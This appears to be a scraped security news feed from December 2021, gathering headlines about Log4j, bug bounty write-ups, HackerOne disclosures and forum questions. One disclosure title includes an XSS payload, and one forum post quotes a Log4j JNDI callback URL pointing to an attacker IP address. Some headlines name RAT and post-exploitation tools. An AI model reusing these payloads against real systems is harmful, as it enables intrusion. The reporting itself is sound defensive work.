    来自数十项渗透测试和安全评估的数据表明,几乎每个组织都可能被网络攻击者渗透。
  • Open

    [project]Gain Access to the Target System using Trojans
    Lab1 :Gain control over a victim machine using the njRAT RAT Trojan Continue reading on Medium »  ( 1 min )
    Beyond Long4j: A Twitter Spaces Summary
    In the latest Long4j Twitter spaces discussion, @syndrowm from the team at RandoriAttack, Laughing Mantis and MG, led a community-wide… Continue reading on Medium »  ( 2 min )
  • Open

    Logback RCE Vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-42550 Comments URL: https://news.ycombinator.com/item?id=29659429 Points: 2 # Comments: 1  ( 3 min )
  • Open

    Hello everyone, question directed at people who have experience working in this field of exploit dev/ reversing
    Do u have to be an expert in other things like web security/pen testing for example. I enjoy doing reversing and finding bugs and exploiting them(still learning) and was wondering if there are other skills that someone needs to be an expert in before landing a job in this field. I do have a lot of the basics down in web security and networking but I’ve always found those pretty boring and I never really enjoy the process as much as I do from reversing and looking for things to exploit in binaries or operating systems. A lot of the security jobs out there tend to be very vague in the job description. I’m not laser focused into getting a job in this field as I’m still a software engineer and do this as a hobby but if I ever get the opportunity I would gladly take it. submitted by /u/BetaPlantationOwner [link] [comments]  ( 1 min )
  • Open

    How “assertions” can get you Hacked !!
    A deep dive into the assert() function and ways to exploit it!  ( 6 min )
  • Open

    How “assertions” can get you Hacked !!
    A deep dive into the assert() function and ways to exploit it!  ( 6 min )
  • Open

    How “assertions” can get you Hacked !!
    A deep dive into the assert() function and ways to exploit it!  ( 6 min )

  • Open

    ZAP과 Burpsuite에서 feedback 정보를 수집하지 못하도록 제한하기
    최근에 ZAP의 Core addon 중 하나인 Callhome이 업데이트 되었습니다. 기존에 Callhome은 단순히 메인에 News 정보를 보여주기 위해 만들어진 기능인데, 이번에 Telemetry 관련 부분이 추가됬습니다. Telemetry는 ZAP 사용성 정보등을 수집하기 위한 기능인데요, ZAP쪽 설명으로는 취약점이나 개인정보 등은 수집하지 않고 단순 통계 정도만 수집한다고 합니다. 어쨌던 저처럼 이런 정보 수집에 민감하신 분들은 별도로 Disable 처리 하셔야할 것 같습니다. (Burpsuite는 오래전부터… 😱) 오늘은 겸사겸사 ZAP과 Burpsuite에서 이러한 사용성 정보를 수집하는 이유와 이를 Disable 하는 방법에 대해 정리해둘까 합니다.
  • Open

    Cache Poisoning DoS on downloads.exodus.com
    Exodus disclosed a bug submitted by youstin: https://hackerone.com/reports/1173153 - Bounty: $2500
    Static files on HackerOne.com can be made inaccessible through Cache Poisoning attack
    HackerOne disclosed a bug submitted by youstin: https://hackerone.com/reports/1181946 - Bounty: $2500
    Cache poisoning Denial of Service affecting assets.gitlab-static.net
    GitLab disclosed a bug submitted by youstin: https://hackerone.com/reports/1160407 - Bounty: $4850
    Cache Poisoning DoS on updates.rockstargames.com
    Rockstar Games disclosed a bug submitted by youstin: https://hackerone.com/reports/1219038 - Bounty: $500
    photo-test.gb.ru ()
    Mail.ru disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1257091
    Rxss on via logout?service=javascript:alert(1)
    U.S. Dept Of Defense disclosed a bug submitted by xko2x: https://hackerone.com/reports/1406598
  • Open

    Tried making bootable Caine OS usb from rufus and balena etcher non of them were bootable, how do you fix missing partition error?
    submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    Collating a Team
    Hi, I'm curating interested parties into a voluntary investigative team using forensic architecture and Bellingcat OSINT techniques to represent data and events which occurred under the Mahamat Said Abdel Kani reign in CAR. I would like to compile a report and subsequent video detailing the key atrocities that were committed under this reign, how they were carried out, and the impact on the victims. This report will hopefully be evidenced to the ICC, but would also be for personal exhibition to all contributors. Message me if you're interested :) submitted by /u/bg0203 [link] [comments]  ( 1 min )
    How do you boot Caineos from usb
    just downloaded caine os, but caine11.0.iso does not have a boot file computer boots into black screen when booting from usb submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
  • Open

    Log4j vulnerability: LaTeX is not affected
    Article URL: https://www.latex-project.org/news/2021/12/21/log4j-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29656288 Points: 3 # Comments: 0  ( 1 min )
    Azure App Service vulnerability exposed hundreds of source code repositories
    Article URL: https://www.wiz.io/blog/azure-app-service-source-code-leak Comments URL: https://news.ycombinator.com/item?id=29655594 Points: 4 # Comments: 0  ( 5 min )
    Apache Log4j Vulnerability Guidance
    Article URL: https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance Comments URL: https://news.ycombinator.com/item?id=29653370 Points: 1 # Comments: 0  ( 5 min )
    Bug bounty platforms handling thousands of Log4j vulnerability reports
    Article URL: https://portswigger.net/daily-swig/bug-bounty-platforms-handling-thousands-of-log4j-vulnerability-reports Comments URL: https://news.ycombinator.com/item?id=29651771 Points: 1 # Comments: 0  ( 5 min )
    Acronis Vulnerability Scan Reliability
    is the Acronis vulnerability scan reliable? it detects my docker, python, apple music have vulnerability. Comments URL: https://news.ycombinator.com/item?id=29648153 Points: 1 # Comments: 0
    Current 0-day vulnerability on FreePBX
    Article URL: https://community.freepbx.org/t/0-day-freepbx-exploit/80092 Comments URL: https://news.ycombinator.com/item?id=29646626 Points: 37 # Comments: 6  ( 6 min )
    Log4j Vulnerability (Log4Shell) Explained – For Java Developers [video]
    Article URL: https://www.youtube.com/watch?v=uyq8yxWO1ls Comments URL: https://news.ycombinator.com/item?id=29643836 Points: 3 # Comments: 0
  • Open

    Ultimate Reconnaissance RoadMap for Bug Bounty Hunters & Pentesters
    Advanced Reconnaissance and Web Application Discovery RoadMap to Find Massive Vulnerabilities. Continue reading on Medium »  ( 5 min )
    Shopify Plugin Bypass using Client-side injection thru API Implementation Vulnerability
    Hi, I am Kurt Russelle Marmol doing bug hunting for more than a year, and this is my first bug bounty write-up about my findings. Continue reading on Medium »  ( 2 min )
    Learn365 Challenge Review & Year 2021 in a Nutshell
    Learning is an essential factor irrespective of your domain, level of expertise and experience. It helps one to constantly improve their… Continue reading on Medium »  ( 3 min )
    How to be a Bug Bounty Hunter
    Hello guys, in this article I’m going to share some tips on how to become a successful bug hunter. I´m Octavian, a network engineer by day… Continue reading on Medium »
    Share and Win $BUSY!
    Steps to follow: Continue reading on BusyTechnology »
    A guide to our dApp and benefits for our users
    With the launch of our testnet and bugbounty programme, we would like to give our community a brief on our dApp and the various services… Continue reading on Medium »  ( 2 min )
    A Hacker’s Guide to Submitting Bugs on Immunefi
    Many whitehat hackers and bug bounty hunters who discover Immunefi already have some experience under their belt. They’ve often submitted… Continue reading on Immunefi »  ( 8 min )
    How I was able to bypass WAF and find the origin IP and a few sensitive files
    Hello hunters, Continue reading on Medium »  ( 1 min )
    Campaign | Announcing Parami Protocol’s Bug Bounty Program
    Parami is offering $500,000 AD3 for bug hunters! Continue reading on Medium »  ( 2 min )
  • Open

    [Buffer Overflow] Looking for help for a ROP issue
    Hello ! ​ I am currently applying (learning purpose) the following tutorial about a ROP-based buffer overflow inside my Kali VM: https://www.dailysecurity.fr/return_oriented_programming/ ​ However i m unable to reproduce the same behavior and get a shell... ​ I m currently debugging with Peda GDB and have seen strange things such as a SIGSEGV fault. ​ I m a beginner and don't feel comfortable with some points: - does my EIP during the SIGSEGV is correct ? It looks like to be not in vmmap ranges (0x7... instead of 0x8...). - Moreover "Leak scanf" has a strange value interpreted as string "JHmp" - Why there are values in my stack between gadget_pop_ebx and /bin/bash instead of just padding+leak_system+gadget_pop_ebx+leak_binsh ? - When invoking "Leak system" with "SHELL=/bin/bash" does it work with prefix "SHELL=" ? Or need another string ? - In comments someone said he had an issue with scanf interpreting space 0x20 but after checking address I think I m not concerned. Just maybe "Leak scanf" has 0x0a in the address could generate an error ? ​ Could you help me to understand why it doesn't work ? I have attached screenshots with values of the stack, registers, etc to help your understanding (The GDB break is located to the RET of vuln() function to follow the ROP chain with the overwriting of "saved eip") ​ Many thanks !! ​ Update: ​ I have updated my libc and it works fine now... Still don't understand why it didn't work before. ​ Screenshots: https://ibb.co/VmGxwC4 https://ibb.co/SPy5jNb https://ibb.co/PmMRbf0 https://ibb.co/3vHkT9Q submitted by /u/Oni_Nephilim [link] [comments]  ( 1 min )
    How do you tolerate how buggy and trash bettercap is?
    Do you just use ettercap-ng? Do the old tools work just as well as bettercap's lame ass does? submitted by /u/master-berator [link] [comments]  ( 1 min )
    Did I find proof of major hack vector possibly? Macbook
    Hi everyone, Would like a quick opinion- suffered a 6 fig hack of multiple crypto wallets in Sept. I was checking the console of my macbook for any access events or really anything at all just in case and I saw these logs from August (~7-12 days before the hack on Sept 2nd) that look like reference to some update and looks like an iPhone is possibly involved? Not sure. The vector was likely a file on my computer (not online) holding seed phrases. I didn't update my iPhone or connect my iPhone to my macbook to update at any point during that timeframe as far as I can remember. Is it possible someone on a shared network could use an iPhone to somehow access private files and data on my macbook? Or otherwise, any idea what these console events could be regarding? I am already working with US secret service on the actual tracking of the stolen crypto funds. We were not able to find the vector of the breach of private data however. Wondering if this is info that is a clue? Imgur Thanks submitted by /u/Intel81994 [link] [comments]  ( 1 min )
    Microsoft Azure Bug Leaks Linux Source Code Repository
    A cloud security vendor, Wiz.io discovered a four years old bug in the Microsoft Azure App Service that exposed the source code of customer applications written in PHP, Python, Ruby, or Node, that were deployed using “Local Git”. The vulnerability, dubbed as “NotLegit”, has existed since September 2017 and has probably been exploited in the wild. The issue resides in the Azure App Service, when users use the “Local Git” deployment method to deploy to the Azure App Service, the .git folder gets created in the content root, which puts their data and source code at risk for information disclosure. This behavior of Azure App Service via Local Git was known to Microsoft and the company added a “web.config” file to the .git folder within the public directory that restricted public access. How…  ( 2 min )
    "Find My Phone" went off on my phone, but I didn't activate it??
    Is this a normal thing, or could something weird be going on? I have my own wifi with a custom password. submitted by /u/SeaCommunication11 [link] [comments]  ( 1 min )
    Network Streaming Analytics With IoT
    What are threads can identify on packet sniffer? submitted by /u/Sangeeth17 [link] [comments]
    What's the main difference in Linux and UNIX? (read post)
    I'm studying about Linux systems in University now. And I'm pretty confused if Linux and UNIX are two different entities cuz my college professor seems to use these terms interchangeably and creating all this massive chaos between these two lol. So I did some research at my own to see the difference but the results were quite confusing at first glance, so now I want yall to give me correct answer, are they both same or different???? submitted by /u/The_Intellectualist [link] [comments]  ( 4 min )
    Log4j: Is the IP in this callback URL known as a serious attacker or just a PoC?
    Imgur wont let me upload a pic, so here's the callback URL I found in an IPS log (dated Dec 11): ldap://45.130.229.168:1389/Exploit This looks a lot like just a copy-pasted log4j PoC. Or has anybody been seriously compromised by this IP? submitted by /u/e_hyde [link] [comments]  ( 1 min )
    Best way to wipe external hard drive securely on windows?
    I still need to use the drive after so physical destruction is not an option. I need to remove the data completely so that recovery software won't be able to recover anything. I don't think just formating the drive will be enough. I've heard of DBAN but it seems more for internal drive and I'm paranoid that might accidentally wipe my internal drive instead. submitted by /u/snkhuong [link] [comments]  ( 3 min )
    Network Streaming Analytics With IoT
    Hello Everyone, I am requesting you to fill this survey. it will help me to archive my final year research project. this project is based on developing network streaming analytics in nearly real-time with IoT devices. link is given below. Thanks. https://docs.google.com/forms/d/e/1FAIpQLSeXVeRCn43xodLsY86RK226Nhkq3A0CVS7HLyaaPNOv1VOSeg/viewform?usp=sf_link submitted by /u/Sangeeth17 [link] [comments]
    help a newbie understand what's happening with https & SSL/TLS question.
    Hello all, I'm a little confused on https and SSL/TLS. I set up a service and Nginx reverse proxy manager. I have a domain with Cloudflare. I used letsencyrpt ssl certs when adding the host to my proxy manager. In Cloudflare I'm using full SSL/TLS encrypt setting. When I go to my service outside of my network it says not secure in the toolbar. I asked this question in another sub and was told it was okay. but I looked at Wireshark and was easily able to find my password in clear text :( What exactly is encrypted and when? ​ The service does work over https but it also wants me to point it to the PKCS #12 file. I download the certs from proxy manager and not sure what file to actually upload. I can get help on this question in that services sub later. Thank you for your help in advance. submitted by /u/Famous_Relative2500 [link] [comments]  ( 1 min )
    Do you speak at conferences?
    I'm curious about how people who speak at conferences got into it. I always associated them with senior level IT execs just trying to sell a product. But I learn that anyone could submit to speak. Those of you that regularly speak at conferences, I'd love to hear more about how you got into it... What year did you start speaking at conferences? What was your first presentation about? What got you into it?Why did you start? What keeps you going with being a presenter? How have your presentations evolved over time? How have you evolved as a speaker over time? What are you presenting on in recent history? Are you speaking in 2022? Of yes, what event(s)? submitted by /u/gnomeparadox [link] [comments]  ( 5 min )
  • Open

    On Writing DFIR Books, pt III
    Editing and Feedback When it comes to writing books, having someone can trust to give you honest, thoughtful, insightful feedback is a huge plus. It can do a lot to boost your confidence and help you deliver a product that you're proud of. When I first started writing books, the process of going from idea to a published book was pretty set...or so I thought, being new and naïve to the whole thing. I put together an idea for a book, and started on an outline; I did this largely because the publisher was asking for things like a "word count". Then they'd send me a questionnaire to complete regarding the potential efficacy of the book, and they'd send my responses to a panel of "experts" within the industry to provide their thoughts and insight. However, there wasn't a great deal of insight i…  ( 6 min )
  • Open

    Cross Examination: Unveiling JavaScript injection based browser fingerprint masking attempts
    submitted by /u/ziyahanalbeniz [link] [comments]
    Elastic Security disrupts new BLISTER campaign leveraging code signing certificates.
    submitted by /u/expertsnowboarder [link] [comments]
    Cloud Web Application Firewall (WAF) CyberRisk Validation Comparative Report
    submitted by /u/markcartertm [link] [comments]
    Vulnerabilities in the Abode IOTA security system (fixed as of Dec 17th 2021)
    submitted by /u/jaymzu [link] [comments]
    Microsoft Teams: 1 feature, 4 vulnerabilities
    submitted by /u/breakingsystems [link] [comments]  ( 1 min )
    intuitive advanced cryptography [PDF]
    submitted by /u/netfortius [link] [comments]
    Responder and IPv6 attacks - Inject a DNS suffix on Active Directory via IPv6 DNSSL
    submitted by /u/Gallus [link] [comments]  ( 1 min )
    Why it's hard to fix the Java ecosystem
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]  ( 1 min )
  • Open

    How I found the Authentication Bypass bug and Earn $$$$
    Hi all,  ( 3 min )
    How I Found My First XSS Bug and Earn $$$
    Hi everyone,  ( 3 min )
    Account takeover by tampering the Signup verification token .
    Hello People ,  ( 3 min )
    Accessing Thousands of Covid-19 Patients Confidential Information. [CVE-2020–35276]
    Hey there, Yash Here, I’m noob BB Hunter & Security researcher from India.  ( 2 min )
    ECDSA/ECC digital certificates and other stuff not everyone is using
    Elliptic Curve Cryptography Digital Certificates Continue reading on InfoSec Write-ups »  ( 2 min )
    Tackling CVE-2021–41277 Using a Vulnerability Database
    In this article, I’ll talk about a security vulnerability (CVE-2021–41277), which has been popular in the InfoSec committee recently. I’ll…  ( 5 min )
  • Open

    How I found the Authentication Bypass bug and Earn $$$$
    Hi all,  ( 3 min )
    How I Found My First XSS Bug and Earn $$$
    Hi everyone,  ( 3 min )
    Account takeover by tampering the Signup verification token .
    Hello People ,  ( 3 min )
    Accessing Thousands of Covid-19 Patients Confidential Information. [CVE-2020–35276]
    Hey there, Yash Here, I’m noob BB Hunter & Security researcher from India.  ( 2 min )
    ECDSA/ECC digital certificates and other stuff not everyone is using
    Elliptic Curve Cryptography Digital Certificates Continue reading on InfoSec Write-ups »  ( 2 min )
    Tackling CVE-2021–41277 Using a Vulnerability Database
    In this article, I’ll talk about a security vulnerability (CVE-2021–41277), which has been popular in the InfoSec committee recently. I’ll…  ( 5 min )
  • Open

    How I found the Authentication Bypass bug and Earn $$$$
    Hi all,  ( 3 min )
    How I Found My First XSS Bug and Earn $$$
    Hi everyone,  ( 3 min )
    Account takeover by tampering the Signup verification token .
    Hello People ,  ( 3 min )
    Accessing Thousands of Covid-19 Patients Confidential Information. [CVE-2020–35276]
    Hey there, Yash Here, I’m noob BB Hunter & Security researcher from India.  ( 2 min )
    ECDSA/ECC digital certificates and other stuff not everyone is using
    Elliptic Curve Cryptography Digital Certificates Continue reading on InfoSec Write-ups »  ( 2 min )
    Tackling CVE-2021–41277 Using a Vulnerability Database
    In this article, I’ll talk about a security vulnerability (CVE-2021–41277), which has been popular in the InfoSec committee recently. I’ll…  ( 5 min )
  • Open

    SecWiki News 2021-12-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    FreeBuf早报 | 2easy暗网正在倾销窃取的数据;恶意程序Joker被下载50万次
    安全人员发现,一个名为“2easy”的暗网市场正在大幅倾销数据,这些数据是从约 600,000 台感染的设备上窃取。  ( 1 min )
    硅谷快速致富的新工作:加密初创企业
    更多人是被Web3的精神所吸引,寻求权力和决策的下放。  ( 1 min )
    直播回顾 | CIS 2021春日版议题预告直播继续与您相约~
    在冬至最长的夜里,近万人守候在FreeBuf直播间,观看CIS 2021春日版议题预告直播。  ( 1 min )
    漏洞危机爆发时,企业该做什么?
    有关安全漏洞事件,国家有一套详细的法律法规,约束相关企业“尽早申报”,协助相关行业的企事业单位即时“补漏”。
    一篇文章玩明白Stack-migration
    一篇文章玩明白Stack-migration.  ( 2 min )
    实用技能:域名解析故障排查的几种常见方法
    DNS域名解析是访问网站的重要环节之一。
    戴尔BIOS更新后可能导致电脑无法正常启动
    戴尔最近发布的BIOS更新在多个笔记本电脑和台式机型号上引起严重启动问题。  ( 1 min )
    《上海市建设网络安全产业创新高地行动计划(2021-2023年)》全文发布
    总的来说,《行动计划》共提出4项主要目标,3大建设高地,10项建设任务,以及7项保障措施。
    安全知识图谱 | 绘制软件供应链知识图谱,强化风险分析
    《践行安全知识图谱,携手迈进认知智能》精华解读系列第七篇,介绍了知识图谱相关技术如何在软件供应链安全领域应用。  ( 1 min )
    企业IoTOT网络安全现状
    在2021年发生了多起针对网络设备、监控系统、管道和水处理设施的知名网络攻击事件,使得大幅改进IoT/OT网络安全的需求变得更加明显。  ( 1 min )
    TikTok Live Studio 使用OBS源代码,违反GPL协议
    近日,有推特用户称TikTok最新上线的软件TikTok Live Studio疑似使用了OBS (Open broadcasting Software)的源代码,但是却没有遵守相关的开源许可条款。  ( 1 min )
    谷歌警告称,超过35000个Java包受 Log4j 漏洞影响
    谷歌扫描Maven Central Java软件包库,发现35863个软件包使用的Log4j库版本易受Log4Shell漏洞攻击。  ( 1 min )
    DNS Flood类型攻防梳理和思考
    重点针对攻击原理、防护原理进行说明,针对如何测试,提供参考。  ( 1 min )
    SIP协议报文攻击与防御
    攻击原理SIP(Session Initiation Protocol)是一个应用层的信令控制协议。用于创建、修改和释放一个或多个参与者的会话。这些会话可以是Internet多媒体会议、IP电话或多媒  ( 1 min )
    FreeBuf早报 | 阿里云被暂停工信部网络安全威胁信息共享平台合作单位;摩根员工使用加密应用被罚2亿美元
    全球各地麻烦事儿都不少,FreeBuf早报,安全早知道。  ( 1 min )
  • Open

    Google搜尋技巧 -只會關鍵字不夠,利用這7招強化搜尋力
    參考資料: https://support.google.com/websearch/answer/2466433 Continue reading on Medium »
  • Open

    dead birds
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    large chests
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    [CVE-2021–44855] Blind Stored XSS in VisualEditor media dialog at Wikipedia
    Assalamualaikum Bug Hunter & Hi Everyone Continue reading on Medium »  ( 2 min )

  • Open

    Can you recommend any tool for packet sniffing with the ability to filter traffic by processes?
    It should be a Linux tool (Windows as a last resort). It is desirable that it has the ability to decrypt SSL, TLS. The presence of a GUI will also be a big plus. All I want is to see which processes are sending which traffic. submitted by /u/vend_igo [link] [comments]  ( 1 min )
    Security experts of Reddit: In this paper it is claimed that, for $1400, a device can be constructed that intercepts cellular data. Is this still the case?
    *LTE data specifically Short Long submitted by /u/iExtrapolate314 [link] [comments]  ( 4 min )
    How do you curate the learning resources out there for cybersecurity?
    As a cybersecurity professional we always keep learning new things. The best part of the internet is that there's free and paid fees out there and there are many options. The worst part is also that there are so many option. So how to do curate if a resource (blog/lab like HackTheBox/wordlists/tools) is worth learning from? I have a huge list of resources. I've dipped my toe to see what fits but now I'm overwhelmed where to start because there are too many good resources. submitted by /u/writerlyhacker [link] [comments]  ( 1 min )
    Incident handling/response certs?
    have mixed feelings about certifications providing any real value but we have funds for a cert and I’m hoping to find a decent one that goes over the incident response lifecycle for our SOC. SANS is a bit too pricey, curious if anyone has any they would recommend. submitted by /u/freeridevt [link] [comments]  ( 1 min )
    Will attack such as LLMNR, NBT-NS and MDNS poisoner cause any issue to internal network?
    I've seen these kind of attacks are pretty common in any internal pentest tutorial. But is this save? Will it cause any issue to customer's network? submitted by /u/w0lfcat [link] [comments]  ( 1 min )
    What is the best way to log DNS when DoH is used?
    I don't have the ability to block DoH because of legal/politics. So what is the best way to get an idea for the DNS name? The only sources I know are: Domain names extracted from SSL certificates Autonomous System lookups combined with maybe port number Manual DNS lookups I can't break SSL with a proxy, either. I have no idea what the best way to go about this is, or if there is some other data that can be combined with all of this to make identifying the IP easier. Does anyone know of some options? submitted by /u/greyyit [link] [comments]  ( 1 min )
    Guys I recently download some photorecover apps and I'm scared that they might have stolen my photos
    Are most google play apps malicious to the extent that they steal photos and sell my privacy? I already installed them and deleted them and now I'm trembling with fear. submitted by /u/WhiteSwordMaster [link] [comments]  ( 1 min )
    ModSecurity: Add custom error page or header to blocked requests
    Hi, Using an Nginx ingress, is it possible to add a header or present a custom error page for requests that were blocked by ModSecurity? (or is it using the Ingress settings?) submitted by /u/QuickWin1 [link] [comments]  ( 1 min )
  • Open

    【安全通报】Apache HTTP Server 更新多个安全漏洞(CVE-20...
    近日,Apache HTTP Server 发布安全更新,修复了 Apache HTTP Server 中的服务端请求伪造(SSRF)和缓冲区...  ( 1 min )
  • Open

    【安全通报】Apache HTTP Server 更新多个安全漏洞(CVE-20...
    近日,Apache HTTP Server 发布安全更新,修复了 Apache HTTP Server 中的服务端请求伪造(SSRF)和缓冲区...  ( 1 min )
  • Open

    Ansible Red Hat detector Remote Code Execution – Log4j (CVE-2021-44228)
    Article URL: https://github.com/lucab85/log4j-cve-2021-44228 Comments URL: https://news.ycombinator.com/item?id=29643144 Points: 1 # Comments: 0  ( 3 min )
    Detect and fix Log4j log4shell vulnerability (CVE-2021-44228)
    Article URL: https://github.com/Nanitor/log4fix Comments URL: https://news.ycombinator.com/item?id=29638794 Points: 1 # Comments: 0  ( 2 min )
  • Open

    Network Security Trends: August-October 2021
    Network attacks observed August-October 2021 included high levels of cross-site scripting, code execution and directory traversal. The post Network Security Trends: August-October 2021 appeared first on Unit42.
  • Open

    I made a tool to cover your tracks post-exploitation on Linux machines for Red Teamers
    submitted by /u/mufeedvh [link] [comments]  ( 2 min )
    Hook Heaps and Live Free
    submitted by /u/jat0369 [link] [comments]
    Common security issues when configuring HTTPs connections in Android
    submitted by /u/Masrepus [link] [comments]  ( 2 min )
    Android application testing using windows 11 and windows subsystem for android
    submitted by /u/0xdea [link] [comments]
    RCE in Visual Studio Code's Remote WSL for Fun and Negative Profit
    submitted by /u/parsiya2 [link] [comments]  ( 4 min )
  • Open

    Log4j Vulnerability Explanation In Details
    Everything you need to know about log4j vulnerability as a hacker !  ( 4 min )
    Bypassing OTP Verification for Changing PIN in Registered Mobile Banking Account.
    Assalamu’alaikum (Peace be upon you)  ( 4 min )
    Inclusion TryHackme
    Hi, amazing hackers I today came another interesting topic which is local file inclusion. Local File Inclusion is part of OWASP's top 10…  ( 2 min )
    Static from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 13 min )
  • Open

    Log4j Vulnerability Explanation In Details
    Everything you need to know about log4j vulnerability as a hacker !  ( 4 min )
    Bypassing OTP Verification for Changing PIN in Registered Mobile Banking Account.
    Assalamu’alaikum (Peace be upon you)  ( 4 min )
    Inclusion TryHackme
    Hi, amazing hackers I today came another interesting topic which is local file inclusion. Local File Inclusion is part of OWASP's top 10…  ( 2 min )
    Static from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 13 min )
  • Open

    Log4j Vulnerability Explanation In Details
    Everything you need to know about log4j vulnerability as a hacker !  ( 4 min )
    Bypassing OTP Verification for Changing PIN in Registered Mobile Banking Account.
    Assalamu’alaikum (Peace be upon you)  ( 4 min )
    Inclusion TryHackme
    Hi, amazing hackers I today came another interesting topic which is local file inclusion. Local File Inclusion is part of OWASP's top 10…  ( 2 min )
    Static from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 13 min )
  • Open

    Understanding the Impact of Apache Log4j Vulnerability
    Article URL: https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html Comments URL: https://news.ycombinator.com/item?id=29639132 Points: 1 # Comments: 0  ( 6 min )
    What is the Log4j vulnerability and should I do anything to protect myself?
    Article URL: https://www.washingtonpost.com/technology/2021/12/20/log4j-hack-vulnerability-java/ Comments URL: https://news.ycombinator.com/item?id=29638820 Points: 2 # Comments: 0  ( 1 min )
    Detect and fix Log4j log4shell vulnerability (CVE-2021-44228)
    Article URL: https://github.com/Nanitor/log4fix Comments URL: https://news.ycombinator.com/item?id=29638794 Points: 1 # Comments: 0  ( 2 min )
    Log4j vulnerability: what should boards be asking?
    Article URL: https://www.ncsc.gov.uk/blog-post/log4j-vulnerability-what-should-boards-be-asking Comments URL: https://news.ycombinator.com/item?id=29635047 Points: 1 # Comments: 0
    Is log4js-node affected by the log4s vulnerability? (no)
    Article URL: https://github.com/log4js-node/log4js-node/issues/1105 Comments URL: https://news.ycombinator.com/item?id=29632280 Points: 1 # Comments: 1  ( 3 min )
  • Open

    SecWiki News 2021-12-21 Review
    国外网络演习思考 by ourren CaptfEncoder: 一款跨平台网络安全工具套件 by guyoung 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-21 Review
    国外网络演习思考 by ourren CaptfEncoder: 一款跨平台网络安全工具套件 by guyoung 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Log4j: A forcing function to adopt long-overdue continuous security
    Are you prepared for the next big zero day exploit? Read what we learned from the Log4j crisis and what you can do to secure your assets with continuous AppSec. READ MORE  ( 4 min )
    Trends that underscore the seriousness of the cybersecurity skills gap
    It is no secret that there’s a glaring skills gap in cybersecurity. Learn more about the trends impacting AppSec success and the steps that can help bridge gaps in DevSecOps workflows. READ MORE  ( 6 min )
  • Open

    MCFE certification
    So I took the MCFE about 4 days ago, passed, and I haven't heard back from magnet about my certification. Should I contact someone or just wait a while longer? submitted by /u/bath_and_toaster [link] [comments]  ( 1 min )
    Need help on the state of and keywords for mobile device tracking in 1999
    Everybody look at their shelves and find books/software from 1999. Thank you for any pointers to books or sources. Not an attorney, just helping a friend doing life. Working up an appeal and several FOIA requests and searching for exact phrasing to use. What software/hardware/process existed in 1999 for any level of law enforcement to trace cell tower movements? Feds to state levels. Suspecting it was all tower techs as time permitted. Was any GPS data on a 2G flip worth looking at back in 1999? Looking for more than cell tower data in there maybe? Any specific references to law enforcement access to request tower pings, especially near Kentucky, 1999. (1999) My friend asked his attorneys to get the cell tower data and the lawyer contacted a tech that gave them a highly technical handwritten reply. This note was lost. Police did not produce cell data to place him at scene in a nearby state, KY. Suspect it was suppressed and it needs to be found as a purchase for software/training or Federal cooperation of some department that I am guessing at, like the FCC, FBI or the actual phone company. Thanks again! I am old school, OpenVMS VAX/Alphas ~Peace submitted by /u/OK_AquaFarmer [link] [comments]  ( 3 min )
  • Open

    CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter Fork with some improvements
    submitted by /u/v1brio [link] [comments]
    Powershell .Net Assembly loader for the [CVE-2021-42287 - CVE-2021-42278] Scanner & Exploiter
    submitted by /u/v1brio [link] [comments]
  • Open

    物流巨头数据泄露、网络钓鱼攻击冒充辉瑞|12月21日全球网络安全热点
    美国塔尔萨市政府花费200万美元耗时8个月从勒索软件攻击中恢复过来。  ( 1 min )
    PyMICROPSIA:双尾蝎的新型信息窃取木马再度来袭
    近日,奇安信威胁情报中心红雨滴团队在日常的威胁狩猎中捕获了该组织以Python构建的攻击样本,该类样本最早由国外厂商发现并命名为PyMICROPSIA。  ( 1 min )
    云原生之Kubernetes安全
    随着越来越多企业开始上云的步伐,在攻防演练中常常碰到云相关的场景,例如:公有云、私有云、混合云、虚拟化集群等。  ( 3 min )
    DDoS和CC攻击原理(下)
    本文描述ddos和cc的防护机制。  ( 1 min )
    T-Mobile 今年已拦截210亿个诈骗电话,一半以上与车辆保修诈骗有关
    平均每月识别并拦截 18 亿个企图诈骗电话,也就是每秒 700 个企图诈骗电话!  ( 1 min )
    还能这样执行命令?命令执行绕过及防护规则研究
    命令执行绕过及防护规则研究  ( 1 min )
    黑客利用Log4Shell漏洞攻击比利时国防部
    比利时国防部遭到了网络攻击。
    Clop勒索软件团伙正在泄露英国警方机密数据
    Clop勒索软件团伙成功窃取了英国警方的机密数据,并在暗网上泄露。
    Log4j2远程代码执行漏洞检测和防护策略研究
    Log4j2漏洞已爆出有一段时间,关于如何修复该漏洞各大安全厂商也给出了相应的解决方案。
    ​零时科技 | DeFi平台Grim Finance攻击事件分析
    北京时间2021年12月19日,Grim Finance官方发推文称平台被外部攻击者利用,攻击者盗币价值超过3000万美元。  ( 1 min )
    探寻中国网安行业新兴力量 | 首届「网安新势力」大会筹备启动
    伴随「CIS 2021网络安全创新大会Spring·春日版」的召开,第一届「网安新势力」筹备工作正式启动。
    Meta对网络钓鱼攻击提起诉讼
    Meta正在对网络钓鱼攻击者和出于恶意目的滥用该平台的人,提起的一系列诉讼。  ( 1 min )
  • Open

    admin password disclosure via log file
    Acronis disclosed a bug submitted by darkdream: https://hackerone.com/reports/1121972 - Bounty: $100
    Log4j RCE on https://judge.me/reviews
    Judge.me disclosed a bug submitted by bhishma14: https://hackerone.com/reports/1427589 - Bounty: $50
  • Open

    USA Movies
